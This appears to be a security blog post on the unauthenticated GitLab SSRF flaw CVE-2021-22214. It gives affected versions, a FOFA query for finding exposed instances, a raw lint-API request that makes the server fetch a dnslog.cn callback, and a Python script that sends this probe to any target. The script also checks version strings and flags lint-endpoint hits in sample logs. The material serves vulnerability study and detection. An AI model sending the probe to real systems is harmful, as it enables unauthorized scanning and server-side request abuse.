GitLab SSRF Vulnerability CVE-2021-22214
Vulnerability Description
GitLab has an unauthenticated SSRF vulnerability (CVE-2021-22214) in the CI lint API (POST /api/v4/ci/lint). When the request sets include_merged_yaml to true, the server resolves any include: remote: entries in the submitted YAML before linting, so an attacker who can reach the API can make the GitLab server issue HTTP requests to a URL of their choice. No account is required, and according to GitLab's advisory the endpoint is exposed even on instances where registration is disabled. Reaching addresses on the internal network additionally depends on the admin setting that allows webhook and service requests to the local network; an external callback such as a DNS-logging domain works regardless of that setting.
Vulnerability Impact
GitLab CE/EE 10.5 and later; fixed in 13.10.5, 13.11.5 and 13.12.2.
Asset search (FOFA query)
app="GitLab"
Environment setup
Vulnerability reproduction
The login page is as follows.
Send the following request to the target. The Host header is the target instance, and the dnslog.cn domain is a DNS-logging callback controlled by the tester; on a vulnerable instance the callback receives a lookup and HTTP request from the GitLab server shortly after the request is sent, which is the confirmation, not the content of the lint response.
POST /api/v4/ci/lint HTTP/1.1
Host:
User-Agent: python-requests/2.25.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 111
{"include_merged_yaml": true, "content": "include:\n remote: https://965qaw.dnslog.cn/api/v1/targets?test.yml"}
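As an added example (Python, not code from the original post or from GitLab), the script below builds the same lint request so it can be sent to a target together with a callback host, checks whether a GitLab version string falls in the affected range, and scans access-log lines for unauthenticated POSTs to the lint API. The target URL, the callback domain and the log lines are placeholders or constructed samples, not real data.

```python
#!/usr/bin/env python3
"""Added example for CVE-2021-22214 (not code from the original post).

Assumptions, not from the page: the target URL, the callback host and the
access-log lines below are placeholders / constructed data for illustration.
"""
import json
import re
import urllib.request

# Patched releases per GitLab's advisory; everything from 10.5 up to these is affected.
FIXED_PATCH = {(13, 10): 5, (13, 11): 5, (13, 12): 2}


def version_is_affected(version: str) -> bool:
    """True if a GitLab version string such as "13.12.1" falls in the affected range."""
    major, minor, patch = (int(x) for x in version.split(".")[:3])
    if (major, minor) < (10, 5):
        return False          # vulnerable code path only exists from 10.5 on
    if (major, minor) > (13, 12):
        return False          # 13.13 and later ship with the fix
    if (major, minor) < (13, 10):
        return True           # no backport to branches older than 13.10
    return patch < FIXED_PATCH[(major, minor)]


def build_lint_payload(callback_url: str) -> dict:
    """JSON body for POST /api/v4/ci/lint that reproduces the request in the post.

    include_merged_yaml=true makes the server resolve `include: remote:` before
    linting, so an unpatched instance fetches callback_url server-side.
    """
    ci_yaml = "include:\n  remote: " + callback_url.rstrip("/") + "/api/v1/targets?test.yml"
    return {"include_merged_yaml": True, "content": ci_yaml}


def send_probe(gitlab_url: str, callback_url: str, timeout: int = 15):
    """Send the lint request without credentials; returns (HTTP status, response text).

    The oracle is the callback host receiving a DNS lookup / HTTP request from the
    GitLab server, not the lint response itself.
    """
    body = json.dumps(build_lint_payload(callback_url)).encode()
    req = urllib.request.Request(
        gitlab_url.rstrip("/") + "/api/v4/ci/lint",
        data=body,
        headers={"Content-Type": "application/json", "User-Agent": "python-requests/2.25.0"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


# Detection side: nginx-style access-log lines from a proxy in front of GitLab.
# Constructed sample, not captured traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2021:08:01:12 +0000] "POST /api/v4/ci/lint HTTP/1.1" 200 145 "-" "python-requests/2.25.0"
198.51.100.3 - - [10/Jun/2021:08:01:15 +0000] "GET /users/sign_in HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2021:08:01:20 +0000] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 200 145 "-" "curl/7.68.0"
198.51.100.3 - - [10/Jun/2021:08:02:01 +0000] "POST /api/v4/projects/1/ci/lint HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def find_lint_probes(log_text: str):
    """Return (ip, timestamp, user-agent) for every POST to the unauthenticated lint API.

    The request body is not in the access log, so this is an indicator, not proof:
    confirm with outbound connections from the GitLab host or with GitLab's api_json.log.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"].split("?", 1)[0] == "/api/v4/ci/lint":
            hits.append((m["ip"], m["ts"], m["ua"]))
    return hits


if __name__ == "__main__":
    import sys
    # usage: probe.py https://gitlab.example.com https://xxxxxx.dnslog.cn  (placeholders)
    if len(sys.argv) == 3:
        print(send_probe(sys.argv[1], sys.argv[2]))
    for hit in find_lint_probes(SAMPLE_LOG):
        print("lint probe:", hit)
```

The version check is only useful when the version is already known (the /api/v4/version endpoint requires a token); the probe itself is the reliable test, and on the blue-team side the lint endpoint hits should be correlated with egress connections from the GitLab host to the same external domain.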
This post is licensed under CC BY 4.0 by the author.